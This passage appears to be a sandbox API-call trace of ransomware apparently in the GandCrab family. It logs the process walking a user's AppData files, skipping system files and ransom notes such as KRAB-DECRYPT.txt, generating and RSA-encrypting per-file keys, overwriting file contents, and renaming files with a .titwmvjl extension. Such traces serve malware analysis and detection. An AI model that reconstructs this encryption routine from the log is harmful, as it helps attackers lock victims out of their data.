szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.133] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.133] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.133] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.133] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.134] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.134] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.134] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.134] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0069.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.135] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.135] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.135] GetLastError () returned 0x0 [0069.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.135] CryptDestroyKey (hKey=0x5036f8) returned 1 [0069.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.135] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.136] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.136] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.136] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503638) returned 1 [0069.136] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.136] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.137] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.137] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.137] GetLastError () returned 0x0 [0069.137] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.137] CryptDestroyKey (hKey=0x503638) returned 1 [0069.137] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.137] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.137] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.137] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.138] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x9462, lpOverlapped=0x0) returned 1 [0069.145] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff6b9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x9462, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x9462, lpOverlapped=0x0) returned 1 [0069.146] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0069.147] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.151] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.151] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.151] CloseHandle (hObject=0x2b4) returned 1 [0069.153] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\021ad.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\021Ad.ods.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\021ad.ods.titwmvjl"), dwFlags=0x1) returned 1 [0069.154] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.154] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.154] lstrcmpW (lpString1="14mifZbi6U7g.bmp", lpString2=".") returned 1 [0069.154] lstrcmpW (lpString1="14mifZbi6U7g.bmp", lpString2="..") returned 1 [0069.154] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="14mifZbi6U7g.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp" [0069.154] lstrlenW (lpString=".titwmvjl") returned 9 [0069.154] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp") returned 54 [0069.154] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.154] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp.titwmvjl") returned 63 [0069.154] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp") returned 54 [0069.154] lstrlenW (lpString=".bmp") returned 4 [0069.154] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.155] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0069.155] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0069.155] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.155] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp") returned 54 [0069.155] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp") returned 54 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="desktop.ini") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="autorun.inf") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="ntuser.dat") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="iconcache.db") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="bootsect.bak") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="boot.ini") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="ntuser.dat.log") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="thumbs.db") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="CRAB-DECRYPT.html") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="ntldr") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="NTDETECT.COM") returned -1 [0069.155] lstrcmpiW (lpString1="14mifZbi6U7g.bmp", lpString2="Bootfont.bin") returned -1 [0069.155] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp") returned 54 [0069.155] lstrlenW (lpString=".bmp") returned 4 [0069.155] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.156] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".bmp ") returned 5 [0069.156] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.156] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.156] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\14mifzbi6u7g.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.156] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.156] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.157] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.157] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.157] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.157] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.158] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.158] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.158] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.158] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.158] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.158] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.158] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.158] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.159] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.159] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.159] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.159] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.159] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.159] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.159] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.159] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.160] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.160] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.160] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0069.160] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.160] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.160] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.160] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.161] GetLastError () returned 0x0 [0069.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.161] CryptDestroyKey (hKey=0x5036f8) returned 1 [0069.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.161] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.161] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.162] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503238) returned 1 [0069.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.162] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.162] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.162] GetLastError () returned 0x0 [0069.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.162] CryptDestroyKey (hKey=0x503238) returned 1 [0069.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.163] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.163] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.163] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.163] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0xfda6, lpOverlapped=0x0) returned 1 [0069.169] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff025a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xfda6, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0xfda6, lpOverlapped=0x0) returned 1 [0069.171] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.171] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0069.172] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.176] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.177] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.177] CloseHandle (hObject=0x2b4) returned 1 [0069.179] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\14mifzbi6u7g.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\14mifZbi6U7g.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\14mifzbi6u7g.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0069.179] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.179] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.179] lstrcmpW (lpString1="1tGr2j OogF6b.swf", lpString2=".") returned 1 [0069.179] lstrcmpW (lpString1="1tGr2j OogF6b.swf", lpString2="..") returned 1 [0069.180] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="1tGr2j OogF6b.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf" [0069.180] lstrlenW (lpString=".titwmvjl") returned 9 [0069.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf") returned 55 [0069.180] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.180] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf.titwmvjl") returned 64 [0069.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf") returned 55 [0069.180] lstrlenW (lpString=".swf") returned 4 [0069.180] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.180] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".swf ") returned 5 [0069.180] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0069.180] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf") returned 55 [0069.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf") returned 55 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="desktop.ini") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="autorun.inf") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="ntuser.dat") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="iconcache.db") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="bootsect.bak") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="boot.ini") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="ntuser.dat.log") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="thumbs.db") returned -1 [0069.180] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="CRAB-DECRYPT.html") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="ntldr") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="NTDETECT.COM") returned -1 [0069.181] lstrcmpiW (lpString1="1tGr2j OogF6b.swf", lpString2="Bootfont.bin") returned -1 [0069.181] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf") returned 55 [0069.181] lstrlenW (lpString=".swf") returned 4 [0069.181] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.181] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".swf ") returned 5 [0069.181] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.181] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.181] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\1tGr2j OogF6b.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\1tgr2j oogf6b.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.181] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.182] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.182] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.182] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.183] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.183] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.183] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.183] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.183] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.183] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.183] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.183] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.184] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.184] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.184] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.184] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.184] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.184] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.184] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.185] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.185] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.185] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0069.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.185] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.186] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.186] GetLastError () returned 0x0 [0069.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.186] CryptDestroyKey (hKey=0x503378) returned 1 [0069.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.186] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.187] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.187] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, 